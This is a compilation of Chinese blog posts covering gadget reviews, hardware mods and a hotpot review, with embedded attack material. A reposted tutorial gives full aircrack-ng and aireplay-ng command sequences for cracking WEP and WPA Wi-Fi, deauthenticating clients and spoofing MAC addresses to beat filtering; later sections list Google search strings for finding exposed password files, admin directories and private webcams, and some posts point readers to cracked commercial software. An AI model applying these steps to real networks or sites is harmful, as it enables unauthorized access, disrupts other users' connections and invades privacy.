小肥羊推出新品手工热气羊肉，今天特地去尝鲜。

端上来先拍张照片，服务员说吃多少涮多少，不然会老掉的

        尝了味道后，我们一直认为，很差！价格还那么贵，38元一盆，完全不能和冷冻的羊肉比的，味道很淡！锅底料烧不进去，一点都不鲜。从卫生角度来说，热气的没有冷冻的羊肉卫生。

        大家以后去吃千万不要点这个！！

        还是小肥羊传统的羊肉好吃啊！

这篇日记里提到了：

        诺基亚E70是我用到现在时间最长的手机，尽管是05年的产品，但就算是现在诺基亚最新出品的智能机，功能相比E70也没有什么明显的提升，我的E70的屏幕更是绝对无敌的，352×416的分辨率秒杀诺基亚所有新品手机。

        这次给我的E70加了块LD-3W GPS卫星定位模块，到手后，立即站到单位的阳台上搜索卫星，搜星速度非常快！超过我的想象，因为先前用过N95，站在同样的阳台上，几乎搜索不到卫星，速度非常慢，一定要站到单位的楼顶上才可以搜索到卫星。而我这个只要几秒钟立即搜索到了卫星。

        接下来上网下载导航软件，先是下载了人气最高的Garmin，经过漫长的下载，安装，破解导航程序，破解地图等等繁琐的步骤后，终于可以使用了，站到阳台上开始定位。同样，马上就能搜索到卫星，搜索到之后马上定了位！一看！咦？怎么不是我站的位置？

Garmin定位图片：

        我的单位在岭南路的岭南小区内，竟然定位到了两条马路开外的平顺路、闻喜路靠北的地方。竟然有那么严重的漂移啊！faint！！立马上网查找解决方法，下载了修改漂移的文件，下载了最新的地图，再次尝试，依然严重漂移！上网查了下，有很多人也是这样情况，并且无法解决。

        采用第二套方案，下载了最经典的导航软件Router66，安装过程和破解过程比Garmin简单多了，装好就试验，定位哈准呀！真的是丝毫无偏差！准确的定位出我所在的岭南路岭南小区里！

Router66 定位图片：

指针指上去后显示出岭南小区：

        老婆都叫我换掉它，虽然看中E71，但还是舍不得啊，E70屏幕看惯了，其他手机屏幕都看不习惯了。

        还是拆开来修一下吧。

        方案一：用电位器清洁剂把氧化部分腐蚀掉

        方案二：换个摇杆吧，淘宝上号称“原装”的松下摇杆20元一只，不过焊起来十分有难度！要拿到老爸单位去焊。

        在执行这两个方案前，先拆开来看看清楚。

第一步，关机拿走电池，上后盖用力掰开，看到天线是隐藏在上后盖的

第二步，用T6内梅花螺丝刀，把后面四颗螺丝拧走，就可以把前盖拿开了

拿走摇杆帽，可以看到摇杆了

上面那个图看上去很干净，来一个特写！OH MY GOD! 饱经沧桑啊！怪不得寿命快到了，竟然那么脏！

第三步，拆屏幕排线

恩，可以来一个全家福了

摇杆特写1

摇杆特写2

摇杆长度和宽度基本上都是6毫米，共有8只脚，焊下来还是要用专门的精密电子设备电烙铁焊下来啊

完！

谢谢大家～

满好玩的

转自www.anywlan.com，作者David98

WEP破解

1．装备： IMBX60笔记本（内置Intel3945 无线网卡）、BT3 的U盘系统（需用syslinux命令来指定启动
BT3 的盘符）
2．用户名：root密码：toor，进入图形界面：startx。启动BT3 后,(启动黑屏：xconf再输入startx)
3．加载3945 网卡的驱动。打开一个shell
输入modprobe –r iwl3945
输入modprobe ipwraw

注：不同的网卡有不同的加载方式
4． 查找目标：
用 Airoscript命令（Backtrack/radio network analysis/80211/all/Aioscript）的扫描功能
连续三次都选择1 发现5个，有4 个加密，data 都是0，开放的netgear 那个AP有一个客户端。PWR
值一般看出信号强度。也可以用airodump-ng wifi0 来搜索

我们选择第一个作为目标，channel为11（上图中的CH 代表信道）。

注：修改自己网卡的MAC地址的命令。
输入macchanger –m 00:11:22:33:44:55 wifi0

5．激活网卡的Monitor模式并工作在11 信道。（加载网卡，激活监听模式，工作在11 信道）
输入airmon-ng start wifi0 11 也可用iwconfi wifi0 来查看网卡的工作模式和工作信道。

可用 aireplay-ng --test wifi0 来测试是否可以注入

6．输入截取数据包命令（截取11 信道的ivs数据包，并保存名为name.ivs）
输入命令airodump-ng --ivs -w name -c 11 wifi0 ，
（--ivs：仅截取ivs数据包，-w：写入文件，-c：截取ivs的信道）
（其中name是获取的ivs 的保存文件的名字，11 是channel值，你根据实际修改）

一. 有客户端WEP 破解
1．有客户端，且合法客户端产生大量有效的数据，能直接获得大量IVS。
思路：1-6步同上
7．直接用aircrack-ng破解
第七步： aircrack-ng -n 64 -b <ap mac> name-01.ivs

2．有客户端，合法客户端只能产生少量ivs 数据，就需要注入攻击加速产生大量ivs。
只要有少量的数据就可能获得arp 请求包，则可用arp 注入模式的-3 模式通过不断向AP 发送
同样的arp请求包，来进行注入式攻击。
思路：1-6步同上
7．用aireplay-ng的arp注入方式获得大量的ivs
第七步：aireplay-ng -3 -b <ap mac> -h <合法客户端mac> wifi0

注：这一步可能时间会长一点，因为需要等到ARP。

3．有客户端，但是客户端根本不在通信，不能产生ARP包。-3注入模式不成功
思路：1-6步同上
7．-0 冲突模式强制断开合法客户端和ap连接，使之重新连接
8．利用-0冲突模式重新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入
第七步：aireplay-ng -3 -b <ap mac> -h <合法客户端mac> wifi0
第八步：aireplay-ng -0 10 –a <ap mac> -c <合法客户端mac> wifi0

4．有客户端，并且客户端能产生有效arp 数据的另类破解方式
前面的步骤一样：
输入modprobe –r iwl3945
输入modprobe ipwraw
输入airmon-ng start wifi0 11
现在，只要一个命令就搞定，输入:
输入wesside-ng -i wifi0 -v 01:02:03:04:05:06 (此格式的APMAC)。

很简单吧，密码出来了。

二．无客户端WEP破解
思路：1-6步同上
因为是无客户端，所以第一步就需要和AP之间建立一个虚拟连接。
这是非常关键的一步。为让AP 接受数据包，必须使自己的网卡和AP 关联。如果没有关联的话，目标AP
将忽略所有从你网卡发送的数据包，IVS数据将不会产生。
第七步：输入aireplay-ng -1 0 -e <ap essid> -a <ap mac> -h < mac> wifi0

如果回显虚拟伪装连接不成功，不能成功的原因很多，具体有如下几种：
1、目标AP做了MAC地址过滤
2、你离目标AP物理距离太远
3、对方使用了WPA加密
5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道
也可以使用命令tcpdump来确认网卡是否已经连接到目标AP上
tcpdump -n -e -s0 -vvv -i wifi0

1．第一种破解方式：
思路：1-7步同上
建立虚拟连接后直接用-2 交互攻击模式，这个模式集合了抓包和提取数据，发攻击包三种能力。
第八步：抓包，提数据和发包攻击
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
发包成功后可得到足够的ivs，然后用aircrack-ng破解。

成功后如上图截获了一个可以直接进行注入的数据包，并回显Use this packet，按y 然后开始
发包攻击，date飞快涨。当获得足够的ivs以后就可破解了。

2．第二种破解方式：
思路：1-7步同上
第八步：利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件（xor 文件）
第九步：然后通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包，
第十步：最后利用交互式攻击模式-2发包攻击。
第八步：采用碎片包攻击模式-5，获得一个PRGA数据包（xor文件）。
输入aireplay-ng -5 -b <ap mac> -h <my mac> wifi0

如顺利，将得到一个可利用的数据包如上图，系统将回显Use this packet ? 输入y 回车，将得到一个至
关重要的xor 文件。

再输入 ls 查看当前目录，你将看到刚才生成的一个后缀名为xor 的文件。

第九步：用数据包制造程序packetforge-ng将上面获得的xor 数据包伪造成可利用的ARP注入包。
输入packetforge-ng -0 -a <ap mac> -h <my mac> -k 255.255.255.255 –l 255.255.255.255 -y
name-xor -w myarp
参数说明：
-y （filename）是用来读取PRGA的文件
-w （filename）将arp包写入文件，我用的文件名是myarp

系统回显：Wrote packet to: mrarp

第十步：采用交互模式-2，发包注入攻击。
输入aireplay-ng -2 –r myarp -x 256 rausb0
【-r】：从指定文件中读取arp数据包
【-x】：定义每秒发送的数据包数量。为避免网卡死机，可选择256，最高不超过1024

输入 y 回车 攻击开始

这时，前面的抓包窗口上的data 将迅速增加。

到数据增加到1.5万以上时。
第十一步：采用aircrack-ng 来进行破解

3．第三种破解方式：
思路：1-7步同上
第八步：利用-4的Chopchop 攻击模式获得一个可用的包含密钥数据文件（xor 文件）
第九步：通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包
第十步：最后利用交互式攻击模式-2发包攻击。
第八步：采用-4 的Chopchop 攻击模式获得一个包含密钥数据的xor 文件
输入aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
参数说明：
-b：设置需要破解的AP的mac
-h：设置用于连接的无线网卡的mac（自己网卡）

顺利将得到一个可利用的数据包，按y 将利用此数据包生产一个xor 文件

如上图所示得到一个名为replay_dec-0523-075615的xor 文件，

第九步：通过数据包制造程序Packetforge-ng提取上面xor 文件来伪造一个arp包
输入packetforge-ng -0 -a <ap mac> -h <my mac> -k 255.255.255.255 –l 255.255.255.255 -y
name-xor -w myarp
如

如上图，成功生成一个名为myarp的可用来注入的arp数据包。
第十步：最后利用交互式攻击模式-2发包攻击。
输入aireplay-ng -2 -r myarp rausb0

发现了可利用的myarp的数据包，按y后，立刻注入攻击。Date疯涨

破解 WPA

1、加载无线网卡驱动
2、设置网卡为在指定的ap 的工作频道的监控模式
这两部与前面相同
3、输入截取数据包命令（截取11信道的cap 数据包，并保存名为12345.cap）
输入命令airodump-ng -w 12345 -c 11 wifi0 ，
（-w：写入文件，-c：截取cap的信道）
（其中12345 是获取的cap的保存文件的名字， 11是channel值，你根据实际修改。）
回车后可以看到是WPA-TIKP-PSK 加密方式

4、进行-0的Deauth验证攻击
这里为了便于WPA握手验证包的获取，必须进行Deauth验证攻击，这个对于采用WPA验证的AP攻击都
会用到，可以迫使AP重新与已连接的合法客户端进行握手验证，重新握手验证过程中获得验证数据包。
输入： aireplay-ng -0 10 -a <ap mac> wifi0
或者输入：aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
解释：-0 指的是采取Deautenticate 攻击方式，后面为发送次数。-c 建议还是使用，效果会更好，这个后面
跟的是监测到的合法的已连接的客户端MAC地址，如上图中显示的。

这里注意，Deauth 攻击往往并不是一次攻击就成功，为确保成功截获需要反复进行，需要说明的是，攻击
期间很可能会导致该AP的其它无线客户端无法正常上网即断网频繁，而且对于一些低端AP可能会导致其
无线功能假死，无法ping通，需重起。
是否获得包含WPA 握手验证包的Cap文件，需要在破解时进行验证，以上Deauth 攻击几次后可以做破解
尝试。WPA破解不用等到数据Data 达到几万，因为它只要一个包含WPA握手验证包就可以了，通过上面
的方法我们已经获得破解WPA 所需的cap文件。即可进行下一步的破解。

5、用得到的CAP 数据包以后进行WPA 破解
破解方式一：用Cap数据包直接暴力破解
从破解难度上讲WEP 是很容易破解的，只要你收集足够的Cap 数据包就肯定可以破解。WPA 的破解需要
有好的密码字典配合才能完成，复杂的WPA密码可能几个月也破解不出来。
1、WEP 数据Cap破解
输入：aircrack-ng -z –b <ap mac> 12345*.cap
12345 是步骤3 中输入的cap的文件名。系统会自动在你输入的文件名后加上-01、-02（如果数据包太多，
系统会自动分成几个文件存储并自动命名，可以使用ls查看），输入12345*是打开所有1234 相关的cap文
件。

常见问题：步骤3中收集数据包已达30W，无法破解密码。可能系统自动分成了几个文件贮存cap包。
如输入name-01.cap 破解可能导致破解不成功，建议使用name*.cap 选择所有的cap 包进行破
解。

破解方式二：WPA 数据Cap破解
输入：aircrack-ng –w password.txt –b <ap mac> 12345*.cap
(-w：是字典破解模式)
Password.txt是你事先准备好的字典。WPA密码破解必须使用字典破解模式。
技巧：可以在windows 下使用下载的字典工具生产字典，再在BackTrack3 下拷贝到/root 下（aircrack 默认
的工作目录在/root）。
请注意，破解WPA 密码的时间取决于密码难易程度，字典包含程度，内存及CPU 等。多则数小时。也可
以把CAP数据包拷贝出来在WIN下用WinAircrack 破解。

注意点：
针 MAC 地址过滤问题： 因为AP 只回应认证的的客户端. 用 airodump-ng 搜索到刚刚连接上ＡＰ的
ＭＡＣ地址，把自己的修改为这个ＭＡＣ地址，就可以突破ＭＡＣ地址过滤的。

Aireplay-ng的6种攻击模式详解

-0 Deautenticate 冲突模式
使已经连接的合法客户端强制断开与路由端的连接，使其重新连接。在重新连接过程中获得验证数据包，
从而产生有效ARP request。
如果一个客户端连在路由端上，但是没有人上网以产生有效数据，此时，即使用-3 也无法产生有效ARP
request。所以此时需要用-0 攻击模式配合，-3 攻击才会被立刻激活。
aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0
参数说明：
【-0】：冲突攻击模式，后面跟发送次数（设置为0，则为循环攻击，不停的断开连接，客户端无法正常上
网）
【-a】：设置ap的mac
【-c】：设置已连接的合法客户端的mac。如果不设置-c，则断开所有和ap连接的合法客户端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0

注：使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器

-1 fakeauth count 伪装客户端连接
这种模式是伪装一个客户端和AP进行连接。
这步是无客户端的破解的第一步，因为是无合法连接的客户端，因此需要一个伪装客户端来和路由器相连。
为让AP接受数据包，必须使自己的网卡和AP关联。如果没有关联的话，目标AP将忽略所有从你网卡发
送的数据包，IVS 数据将不会产生。用-1 伪装客户端成功连接以后才能发送注入命令，让路由器接受到注
入命令后才可反馈数据从而产生ARP包。
aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
参数说明：
【-1】：伪装客户端连接模式，后面跟延时
【-e】：设置ap的essid
【-a】：设置ap的mac
【-h】：设置伪装客户端的网卡MAC（即自己网卡mac）

-2 Interactive 交互模式
这种攻击模式是一个抓包和提数据发攻击包，三种集合一起的模式
1．这种模式主要用于破解无客户端，先用-1建立虚假客户端连接然后直接发包攻击
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
参数说明：
【-2】：交互攻击模式
【-p】设置控制帧中包含的信息（16进制），默认采用0841
【-c】设置目标mac地址
【-b】设置ap的mac地址
【-h】设置伪装客户端的网卡MAC（即自己网卡mac）
2．提取包，发送注入数据包
aireplay-ng -2 –r <file> -x 1024 wifi0
发包攻击.其中，-x 1024 是限定发包速度，避免网卡死机，可以选择1024。

-3 ARP-request 注入攻击模式
这种模式是一种抓包后分析重发的过程
这种攻击模式很有效。既可以利用合法客户端，也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客
户端那一般需要等几分钟，让合法客户端和ap 之间通信，少量数据就可产生有效ARP request 才可利用-3
模式注入成功。如果没有任何通信存在，不能得到ARP request.，则这种攻击就会失败。如果合法客户端和
ap之间长时间内没有ARP request，可以尝试同时使用-0 攻击。
如果没有合法客户端，则可以利用-1 建立虚拟连接的伪装客户端，连接过程中获得验证数据包，从而产生
有效ARP request。再通过-3模式注入。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
参数说明：
【-3】：arp注入攻击模式
【-b】：设置ap的mac
【-h】：设置
【-x】：定义每秒发送数据户包的数量，但是最高不超过1024，建议使用512（也可不定义）

-4 Chopchop 攻击模式，用以获得一个包含密钥数据的xor 文件
这种模式主要是获得一个可利用包含密钥数据的xor 文件，不能用来解密数据包。而是用它来产生一个新
的数据包以便我们可以进行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
参数说明：
-b：设置需要破解的AP的mac
-h：设置虚拟伪装连接的mac（即自己网卡的mac）

-5 fragment碎片包攻击模式用以获得PRGA(包含密钥的后缀为xor 的文件)
这种模式主要是获得一个可利用PRGA，这里的PRGA 并不是wep key数据，不能用来解密数据包。而是
用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标AP重新广播包，当AP重广播
时，一个新的IVS将产生，我们就是利用这个来破解
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】：碎片包攻击模式
【-b】：设置ap的mac
【-h】：设置虚拟伪装连接的mac（即自己网卡的mac）

Packetforge-ng：数据包制造程序
Packetforge-ng <mode> <options>
Mode
【-0】：伪造ARP包
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255
–y<.xor file> -w mrarp
参数说明：
【-0】：伪装arp数据包
【-a】：设置ap的mac
【-h】设置虚拟伪装连接的mac（即自己的mac）
【-k】<ip[:port]>说明：设置目标文件IP和端口
【-l】<ip[:port]>说明：设置源文件IP和端口
【-y】<file>说明：从xor 文件中读取PRGA。后面跟xor 的文件名。
【-w】设置伪装的arp包的文件名

Aircrack-ng：WEP 及WPA-PSK key 破解主程序
Aircrack-ng [optin] <.cap/.ivs file>
Optin
aircrack-ng -n 64 -b <ap mac> name-01.ivs
参数说明：
【-n】：设置WEP KEY 长度（64/128/152/256/512）
aircrack-ng -x -f 2 name-01h.cap
参数说明：
【-x】：设置为暴力破解模式
【-f】：设置复杂程度，wep密码设置为1，wpa 密码设置为2
aircrack-ng -w password.txt ciw.cap
【-w】：设置为字典破解模式，后面跟字典文件，再后面跟是我们即时保存的那个捕获到WPA 验证的抓包
文件。

常见问题荟萃

问题1：我在启动bt3 的时候，输入startx黑屏
解答：在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会，然后出来提示符再输入startx 可进入
win窗口；当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令，同时可用alt+f1 打开
一个shell，alt+f2 打开第二个shell，alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键
问题2：在BT3中打开kismet 的时候窗口一闪就没了。
解答：首先加载驱ifconfig -a rausb0 开始网卡监听:airmon-ng start rausb0。找到/usr/local/etc/kismet.conf
打开此文件在channelsplit=true下面加入一行source=rt2500,rausb0,moniter
注： wusb54g v4一定是rt2500 ,不是加载驱动时显示的rt2570。
3945 的兄弟加入source=ipw3945,eth0,IPW3945

ＦｒｅｅＢＳＤ官网上下载了安装镜像，启动后无限文字循环，不能安装．．．．．．

解决方法只有一个：windows XP下安装Unix的虚拟机

成功运行

VX Nano和接在笔记本上的无线接收器

实物对比
具体规格：
PC（XP或者VISTA）和MAC都兼容
2.4GHZ无线接收器
左右键
高灵敏滑轮
单手搜索键
INTERNET网前进/后退浏览键
光电技术
6个月的电池续航能力
低电量提醒

设计理念：
        VX Nano尽管还是一个光电鼠标，但是罗技极品打造最佳的尺寸和形状来满足顾客的日常使用。虽然某些笔记本鼠标比VX Nano鼠标体积小，但是没一个能有VX Nano的使用手感。Nano面板两边用的是橡胶材料，这的鼠标显得更协调。高精确的鼠标滑轮使你在浏览网页时轻松快速翻网页。滑轮前面的按键可以飞速进行GOOGLE搜索。
        VX Nano随机附带了软件CD，你可以用它来设置VX Nano鼠标。不过这款鼠标属于即插即用鼠标，你不装驱动也没事。
Nano采用的是AA标准电池代替原来的AAA电池。这样电池正常使用寿命可以达到惊人的6个月的续航时间。
        VX Nano虽然很抢眼，但是真正的主角是VX Nano的无线接收器。叫这个接受器有点过了。因为一罐汽水的小拉盖都比它大，当你从包装中拿出Nano接收器，根本就不象一个USB接收器。象图片显示那样，接收器就象一小片黑色塑料的USB插片。但是不要被它的尺寸所迷惑，我房间的台式机就是通过VX Nano鼠标无线控制，信号接收相当强啊。

        Nano鼠标使用很简单，比我以往使用的鼠标都要简单。每次都要插哪个接收器我觉得很麻烦，所以我干脆想把接收器留在笔记本的USB接口,但是Nano接收器只有USB接口的四分之一大，所以把接收器留在USB接口就不可能了。我不用过分夸大接收器的性能。你只需要把它插在你的笔记本和带上鼠标出门，你就可以感到它的好出。很多光电鼠标都是为笔记本用户打造的，把接收器插进储存器时，Nano就会自己关闭。如果你需要保留接收器在底座上而不是在笔记本上，你就要按一个橘黄色按键来删除它。

        少许不足的是当我用移动电池来使用Nano的时候，总是在更换电池的时候把接收器的盖板弄掉到地上。解决这个问题的方法是在鼠标底部用个胶带贴紧盖板。如果你长时间把接收器留在笔记本USB接口上，你不需要担心拿掉电池盖。你记得不用鼠标的时候就把它关了就行了。

        另一个小问题就是我运行大型游戏时，VX Nano鼠标的灵敏度在800dpi和1600dpi之间，光电鼠标的的好处就是速度快，灵敏度精确的时候可以达到1600dpi和2000dpi之间。罗技公司并没有交代出厂的缺省设置是多少。我测试发现Nano的灵敏度设置为800dpi，这样的低灵敏度是为了延长电池的续航时间。但是可惜的是罗技没给用户提供他们所选择的鼠标灵敏度。换句话说，800dpi对于日常的使用已经足够了，VX Nano并不是为了高质量的大型游戏所打造的。它的作用是为了方便笔记本用户的便携，VX Nano没有令我们失望。

今天环球金融中心正式对外开放，150元/人，又多了一个宰外地游客的地方，先放几张官方图。

 

        2007年11月22日，随单位去“验货”，只有施工电梯，等电梯+到楼顶，花了半个多小时，下来的时候花了近一个小时。电梯少，人多！当中n层的民工都没有挤上电梯！等下一班电梯不知道要等到什么时候了。

放图！

 

 

 

1.富士通U1010四芯电池 5200毫安 ￥800左右

2.卡王 功率能够达到500mW的怪胎！加上自制的定向增益天线无敌了  ￥380左右

3.ZIF接口1.8寸SSD固态硬盘

but！此物现在价格天价！RMB5000.00 人民币大写伍仟元整！

第二号方案，使用CF卡+CF转ZIF口转接器模拟SSD硬盘

266速32G CF卡1500元+转接卡30元=1530元左右

很多U1010的朋友想用CF当U1010硬盘用,我自己也是折腾了很久才成功,现在把整个过程公布给大家吧;关于CF转ZIF卡的选择,现

在淘宝上能买到的就一种,我也是用这种卡;

          很多人说这个卡装上CF卡后插到机器上认不出硬盘,在这里我也犯了一个很大的错误,一开始总是以为这个卡的ZIF口只要对准ZIF排线插进去后是好的了,反正ZIF插槽的触点和排线上的触点也都接触到了,但是这个时候如果U1010开机的话转接卡上的灯就会常亮,并且进BIOS是认不出CF卡的,我也是在这里卡了很久都没有进展;

          在台湾的一些论坛上有提到过另一种ZIF转CF的卡,和我们在淘宝上买到的绿卡不一样,他们把ZIF的排线换个方向后居然可以正常使用了,当时我也想办法去买这样的卡,但是一直找不到,这个时候想到如果我们的绿卡让ZIF排线换个方向是不是也能正常使用呢?于是有了这样的想法,但是我们的卡将ZIF排线反插的话是接触不到ZIF插槽的触点的,于是我对ZIF插槽做了简单的改动,让ZIF排线反过来插入也能接触到触点,我的改造很简单,大概就这几步:

1: 把ZIF插槽的黑色卡扣去掉,露出上面的触点

2: 用合适高度的塑料片将卡口的地方垫高点

3: 将ZIF排线慢慢插入,ZIF排线必须要所有的金手指都接触到ZIF插槽上面的触点,并且不能太松,如果太松就要调整第二步用到的垫片了,我是用塑料片加双面胶

4: 将插好的ZIF用透明胶粘一下,要不很容易碰掉

完成这几步后就可以开机看看BIOS能不能认出CF卡了,如果BIOS能认出来就大功告成了

ZIF排线反插入转接卡

再来一张反插的

试验目的：因为总所周知的FTTB的某隐藏属性，所以靠它来实现单线翻倍带宽。
系统要求：单机 单以太网卡 FTTB+LAN一根进线 上网帐号密码一组
必要软件：VMware（商业软件），RouterOS（商业软件），都是商业软件，自己去找破解吧。
我的情况：进线是接在一个家用路由器上的，路由器本身有192.168.1.1的IP。电脑是笔记本，装了vista sp1。VMware 工作站ACE版6.0.4 build93057；RouterOS 2.9.6+Winbox汉化版。
布置过程：
1，安装好VMware后新建一个虚拟机，系统选Linux，内存128M足矣，空间256M足以。然后手动添加几块网卡，都选用桥接（bridged）模式。
2，电脑的系统内手动添加一个新硬件，选网卡-Microsoft loopback adapter环回适配器。因为我家小路由器占用了192.168.1.1，所以就准备组一个192.168.0.x的局域网，让RouterOS做192.168.0.1的网关。把系统里面VMware装的网卡都禁用吧，用不到的。把本地连接网卡和环回适配器网卡都设192.168.0.x，网关192.168.0.1，DNS的话，我还不会让ROS路由，所以就直接把拨号后获得的DNS填进去用了。
3，安装ROS，把下载的破解版的ROS的镜像让虚拟机的光盘载入启动，具体安装步骤网上都有，google之。装完登录，打setup命令，打2次a，设置第一块网卡，我们将它作为网关，名字不要动，ether1，IP为192.168.0.1/24，按2次x退出其他设置。这时就可以不用管ROS了，后面都用Winbox图形界面操作。可以关闭VMware让整个虚拟机在后台运行了。
4，下载一个汉化的Winbox比较便于理解。放在电脑系统里，执行后，登录192.168.0.1。在端口列表中，给每个网卡改个名字易于辨认。192.168.0.1的ether1就改成LAN，其他的不需要IP，都+一个pppoe client，把上网帐号密码填完，下面dial on demand啥的3个checkbox都uncheck。形成图中我的端口列表样子。一旦设置好，它们就会自动拨号了（拨上了就显示connected）。然后IP-防火墙的nat新建一个sourcenat，action改成masquerade。IP-路由这样设，新建一个0.0.0.0/0段的，把拨号以后获得的外网IP全都加进网关里去，192.168.0.1也加进去。这样就完成了，192.168.0.x段的IP都能上网了。
5，情况说明：虽然这样可以进行图中的高速下载了。但网页只能打开google和baidu，其余都不行，我也不想多研究了，ROS应该有更高级的设置吧。
申明：仅作试验参考，所以不支持破解商业软件和利用FTTB漏洞。反正我现在还是老老实实用单线。因为FTTB是小区共享，忙时甚至都会拨不上号，如果你霸占了更多IP和带宽势必会给你的邻居带来不便，而且原来就有250k/s的下行速度，我觉得挺满足了。请大家也自律，共建和谐小区。

商业天线(24 dBi/27 dBi,覆盖范围4 公里)
这个反射面天线尺寸是：
宽度： 87 厘米
长度： 91 厘米
反射面网格尺寸： 2.5 厘米× 1 厘米
反射面伸出到偶极子的方管长度是 30 厘米和面积是2.5 厘米× 2.5 厘米。

收集器的尺寸:

主机地址.x       掩码.y

256-y=A

A÷x余B

x-B=网络号

网络地址+A-1=广播地址

bbs.net130.com
www.sharecenter.net
bbs.netbuddy.org
bbs.chinaitlab.com
www.huawei3.com

第一篇
在搜索框上输入： “index of/ ” 　inurl:lib

再按搜索你将进入许多图书馆，并且一定能下载自己喜欢的书籍。

在搜索框上输入： “index of /” 　cnki

再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口！

在搜索框上输入：　“index of /” 　ppt

再按搜索你就可以突破网站入口下载powerpint作品！

在搜索框上输入： “index of /” 　mp3

再按搜索你就可以突破网站入口下载mp3、rm等影视作品！

在搜索框上输入：　“index of /” .s**

再按搜索你就可以突破网站入口下载flash作品！

在搜索框上输入： “index of /” 　要下载的软件名

再按搜索你就可以突破网站入口下载软件！

注意引号应是英文的！

再透露一下，如果你输入：

“index of /” 　AVI

另补上第二篇
用GOOgle看世界!!!只要你在GOOGLE里输入特殊的关键字,就可以搜到数千个摄象头的IP地址!通过他你就可以看到其所摄的实时影象!!
在google里输入
inurl:"viewerframe?mode="

随便打开一个,然后按提示装一个插件,就可以看到了!!!

再补上第三篇
三则黑客的Google搜索技巧简介
大家都知道，Google毫无疑问是当今世界上最强大的搜索引擎。然而，在黑客手中，它也是一个秘密武器，它能搜索到一些你意想不到的信息。赛迪编者把他们进行了简单的总结不是希望您利用他去攻击别人的网站，而是利用这些技巧去在浩如烟海的网络信息中，来个大海捞针，寻找到对您有用的信息。

如果您是一名普通网民，您可以使用黑客的技巧扩大自己的视野，提高自己的检索效率；如果您是一名网管，请您赶快看看您的网站是否做好了对下面黑客探测手段的防范措施，如果没有就赶快来个亡羊补牢，毕竟隐患胜于明火，防范胜于救灾；如果您是一名黑客，相信您早以在别的黑客站点上见过类似的方法，这篇文章对您没什么用处，这里的技巧对您是小儿科，菜鸟级！您可以节省宝贵的时间做更有意义的事情，这篇文章您不用看了，到别处去吧！

基于上面的考虑我编发了这篇文章。

　　搜索URL

　　比如我们提交这种形式：passwd.txt site:virtualave.net

　　看到了什么？是不是觉得太不可思议了！有很多基于CGI/PHP/ASP 类型的留言板存在这种问题。有时我们得到密码甚至还是明码的！管理员或许太不负责了，或许安全防范的意识太差了，如果你是网络管理员，赶快检查一下不要让恶意攻击者捡了便宜。不要太相信DES加密，即使我们的密码经过DES 加密的密码，黑客们还是可以通过许多破解软件来搞定。

　　这次我们能得到包含密码的文件。“site:virtualave.net”意思是只搜索 virutalave.net 的URL。virutalave.net是一个网络服务器提供商。

　　同样，我们可以搜索一些顶级域名，比如：.net .org .jp .in .gr

　　config.txt site:.jp

　　admin.txt site:.tw

　　搜索首页的目录

　　首页是非常有用的，它会提供给你许多有用的信息。

　　我们提交如下的形式：

　　"Index of /admin"

　　"Index of /secret"

　　"Index of /cgi-bin" site:.edu

　　你可以自己定义搜索的首页字符。这样就可以获得许多信息。

　　搜索特定的文件类型

　　比如你想指定一种文件的类型，可以提交如下形式：

　　file无效:.doc site:.mil classified

　　这个就是搜索军方的资料，你可以自定义搜索。

Google 的特殊功能
1 、查询电话号码
Google 的搜索栏中最新加入了电话号码和美国街区地址的查询信息。
个人如想查找这些列表，只要填写姓名，城市和省份。
如果该信息为众人所知，你就会在搜索结果页面的最上方看到搜索的电话和街区地址
你还可以通过以下任何一种方法找到该列表：
名字（或首位大写字母），姓，电话地区号
名字（或首位大写字母），姓，邮递区号
名字（或首位大写字母），姓，城市（可写州）
名字（或首位大写字母），姓，州
电话号码，包括区号
名字，城市，州
名字，邮递区号

2 、查找 PDF 文件
现在 GOOGLE 的搜索结果中包括了 PDF 文件。尽管 PDF 文件不如 HTML 文件那么多，但他们经常具备一些其他文件不具备的高质量信息
为了显示一个搜索结果是 PDF 文件而不是网页， PDF 文件的标题开头显示蓝色文本。
这就是让你知道 ACRTOBAT READER 程序会启动来阅读文件
如果你的计算机没装有该程序，计算机会指导你去能免费下载该程序的网页。
使用 PDF 文件时，相关的网页快照会由“ TEXT VERSION ”代替，它是 PDF 文档的复制文件，该文件除去了所有格式化命令。
如果你在没有 PDF 链接的情况下想看一系列搜索结果，只要在搜索栏中打上 -inurldf 加上你的搜索条件。

3 、股票报价
用 Google 查找股票和共有基金信息，只要输入一个或多个 NYSE ， NASDAQ ， AMEX 或
共有基金的股票行情自动收录机的代码，也可以输入在股市开户的公司名字。
如果 Google 识别出你查询的是股票或者共有基金，它回复的链接会直接连到高质量的金融信息提供者提供的股票和共有基金信息。
在你搜索结果的开头显示的是你查询的股市行情自动收录器的代码。如果你要查找一家公司的名字（比如， INTEL ），请查看“股票报价”在 Google 搜索结果的金融栏里会有那个公司的主页的链接（比如， WWW.INTEL.COM ）。
Google 是以质量为基础来选择和决定金融信息提供者的，包括的因素有下载速度，用户界面及其功能。

4 、找找谁和你链接
